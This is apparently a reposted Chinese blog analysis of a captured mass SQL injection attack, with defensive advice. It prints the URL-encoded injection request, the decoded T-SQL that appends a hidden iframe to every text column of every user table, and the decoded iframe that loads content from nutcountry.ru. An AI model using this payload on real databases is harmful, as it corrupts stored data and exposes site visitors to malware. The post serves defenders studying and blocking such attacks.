  • 网站注入

    注入代码

    ;dECLaRe%20@s%20vArchAR(4000);SEt%20@S=Cast(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%20aS%20vArCHAR(4000));Exec(@S);

    用 SQL 把其中 Cast(0x…) 的十六进制串解码(还原)后,得到的语句是:

    -- Decoded second stage of the injected request (captured sample).
    -- What the statement does, as written below:
    --   1. Opens a cursor over sysobjects joined to syscolumns, keeping rows where the object
    --      xtype is 'U' and the column xtype is 99, 35, 231 or 167
    --      (presumably user tables and ntext/text/nvarchar/varchar columns; confirm against the server's type ids).
    --   2. For every table/column pair, runs a dynamically built UPDATE that sets the column to
    --      RTRIM(CONVERT(varchar(4000), column)) + CAST(0x... AS varchar(109)).
    -- Defender notes:
    --   * The CONVERT to varchar(4000) means values longer than 4000 characters are cut before the
    --     marker is appended, so stripping the appended string afterwards does not restore them;
    --     recovery of such columns needs a backup.
    --   * The mixed-case keywords and the hex literal only hide the text from naive string matching;
    --     the statement itself is ordinary T-SQL executed with whatever rights the web application's login has.
    --   * Log review: look for DECLARE / CAST(0x / EXEC( sequences (any letter case, URL-encoded) in query strings.
    declArE @T vaRChar(255),@C vARchaR(255) decLarE taBle_cUrsOr CuRSor For select a.nAMe,b.namE froM sYsoBjeCTs a,sYsCOLumNs b wheRE a.id=b.Id aND A.XtYpe='U' aNd (B.XType=99 or b.xtyPE=35 Or b.xTYpE=231 oR B.XTYPe=167) OPEN tAbLe_cUrsor FETch nEXT FroM TAbLe_cuRsoR iNTO @T,@C wHile(@@fetCH_staTuS=0) BEgIN ExeC('UPdAte ['+@t+'] Set ['+@c+']=RtrIm(CONvert(varchAr(4000),['+@c+']))+cAst(0x3C696672616D65207372633D22687474703A2F2F6E7574636F756E7472792E72753A383038302F696E6465782E7068703F7069643D3133222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E AS vARCHAR(109))') fEtCH NeXT FroM tAble_cursor InTo @T,@c End CLose TABLe_cURsor deALlOcaTE taBLE_cUrsor
    其中 cAst(0x… AS vARCHAR(109)) 这段十六进制内容解码后是:

    <iframe src="http://nutcountry.ru:8080/index.php?pid=13" width="0" height="0" style="display:none"></iframe>
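    这种注入是通过地址栏(URL)发起的:攻击者把上面的语句附加在页面接收参数的位置,由后台拼接进 SQL 后执行。防范方法:接收参数时先判断它是不是数字;如果传入的是字符串,则对其中的关键字进行替换。需要注意的是,仅靠关键字替换并不可靠:本例的注入代码就用了大小写混写和十六进制编码来躲避简单的字符串匹配。更稳妥的做法是使用参数化查询,并降低 Web 应用所用数据库账号的权限。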

  • 原文地址:https://www.cnblogs.com/freexiaoyu/p/1809884.html